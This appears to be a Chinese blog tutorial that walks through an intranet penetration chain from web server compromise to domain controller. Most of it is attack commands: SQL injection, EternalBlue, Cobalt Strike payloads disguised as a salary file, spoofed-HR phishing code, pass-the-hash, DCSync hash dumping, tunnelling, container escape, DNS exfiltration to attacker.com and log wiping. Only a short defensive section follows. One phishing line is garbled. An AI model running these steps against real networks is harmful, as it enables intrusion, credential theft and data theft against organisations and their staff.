第12章 第117课、
内网安全实战全流程拆解:从Web到域控的完整攻防
大家好,今天我们来系统性地聊聊内网渗透的完整流程。就像打游戏通关一样,从外围突破到最终拿下整个内网,每个阶段都有不同的技巧和挑战 ( ̄ω ̄;)
1. 阶段一:Web服务器攻陷(Hacked WebServer)
(1) 网络探测:先摸清边界
# 基础网络探测
ping -c 3 target.com
traceroute target.com
# 更专业的扫描(避免触发WAF)
nmap -Pn -sS --top-ports 100 -T4 target.com -oA webserver_scan
现实案例:
就像你想进学校机房,得先看看正门、侧门、消防通道哪个没锁
(2) Web漏洞挖掘
# 快速检测常见漏洞
nikto -h http://target.com
# 针对性测试SQL注入
sqlmap -u "http://target.com/news.php?id=1" --batch --risk=3
典型漏洞:
- SQL注入 → 获取数据库权限
- 文件上传 → 传Webshell
- RCE → 直接执行系统命令
(3) 权限提升
# 查看系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# 检查补丁情况
wmic qfe list brief | findstr "KB2871997"
提权思路:
如果发现没打MS17-010补丁,直接上永恒之蓝
2. 阶段二:办公网络渗透(Hacked Office)
(1) C2基础设施搭建
# 使用Cobalt Strike搭建团队服务器
./teamserver 192.168.1.100 MyPassword
# 生成钓鱼载荷
./c2lint profile.profile -o payload.exe
伪装技巧:
把payload.exe改名为"2023薪资调整方案.docx.exe"
(2) 社工攻击实战
# 简易钓鱼邮件生成(Python示例)
import smtplib
from email.mime.text import MIMEText
msg = MIMEText("点击查看最新考勤记录:http://hr.internal.com")
msg['Subject'] = '重要:msg['Subject'] = '重要:10月份考勤异常通知'
msg['From'] = 'hr@company.com'
msg['To'] = 'victim@company.com'
server = smtplib.SMTP('smtp.office365.com', 587)
server.starttls()
server.login('your_fake_account', 'password')
server.send_message(msg)
心理战术:
利用员工对HR邮件的天然信任
(3) 内网探测
# 快速内网扫描
1..254 | % { Test-Connection -ComputerName "192.168.1.$_" -Count 1 -ErrorAction SilentlyContinue }
# 检查域环境
nltest /domain_trusts
3. 阶段三:域控攻陷(Hacked AD)
(1) 横向移动
# 使用Impacket进行PTH攻击
python3 psexec.py domain/user@192.168.1.50 -hashes aad3b435b51404eeaad3b435b51404ee:49a1f...
(2) 域控定位
# 查询域控制器
nslookup -type=srv _ldap._tcp.dc._msdcs.domain.com
# 获取域管会话
Invoke-UserHunter -Domain domain.com -Stealth
(3) DCSync攻击
# 获取域内所有用户哈希
secretsdump.py domain/admin:'Password123!'@dc.domain.com
4. 阶段四:DevOps环境渗透
(1) 多级代理搭建
# 第一跳(Web服务器)
ssh -D 1080 webuser@web01
# 第二跳(内部跳板机)
proxychains ssh -D 1081 devops@dev01
(2) 隧道穿透
# 使用Chisel建立隧道
# 攻击机:
./chisel server -p 8080 --reverse
# 目标机:
./chisel client 192.168.1.100:8080 R:8888:172.16.0.100:3389
(3) 容器逃逸
# 检查容器权限
cat /proc/self/status | grep CapEff
# 如果是以root运行且特权模式:
docker run -it --privileged --net=host --pid=host -v /:/host ubuntu bash
5. 阶段五:Flag获取与数据渗出
(1) 文件定位
# 搜索敏感文件
Get-ChildItem -Path C:\ -Include *pass*.txt,*cred*.xml -Recurse -ErrorAction SilentlyContinue
(2) 数据渗出
# 通过DNS隧道外传数据
# 使用dnscat2建立通道
dnscat --dns server=attacker.com --secret=mysecret
(3) 痕迹清理
# 清除最近访问记录
Remove-Item -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\* -Recurse -Force
6. 防御视角:企业防护建议
(1) 网络分段
- 办公网与生产网物理隔离
- 域控制器单独VLAN
- 重要系统设置IP白名单
(2) 日志监控
# Linux下关键监控点
tail -f /var/log/auth.log /var/log/syslog
# Windows事件ID重点关注
4624/4625 (登录事件)
4688 (进程创建)
(3) 权限管控
# 定期审计域管权限
Get-ADGroupMember "Domain Admins" | Export-CSV domain_admins_audit.csv
7. 完整攻击流程图
graph LR
A[Web入侵] --> B[办公网渗透]
B --> C[域环境突破]
C --> D[DevOps控制]
D --> E[数据获取]
E --> F[隐蔽渗出]
最后提醒:
- 所有技术请在授权环境下测试
- 企业内网比实验环境复杂得多
- 防御措施也在不断进化,保持学习 (╯°□°)╯︵ ┻━┻
下次我们深入聊聊如何绕过现代EDR系统,有兴趣的同学可以留言讨论具体方向~
感谢浏览和学习,作者:鱼油YOU,转载请注明原文链接:https://www.cnblogs.com/OmegaYOU3/p/19028202,或者可以➕主播WX:OmegaAnimeman_desu;QQ:3819054512
浙公网安备 33010602011771号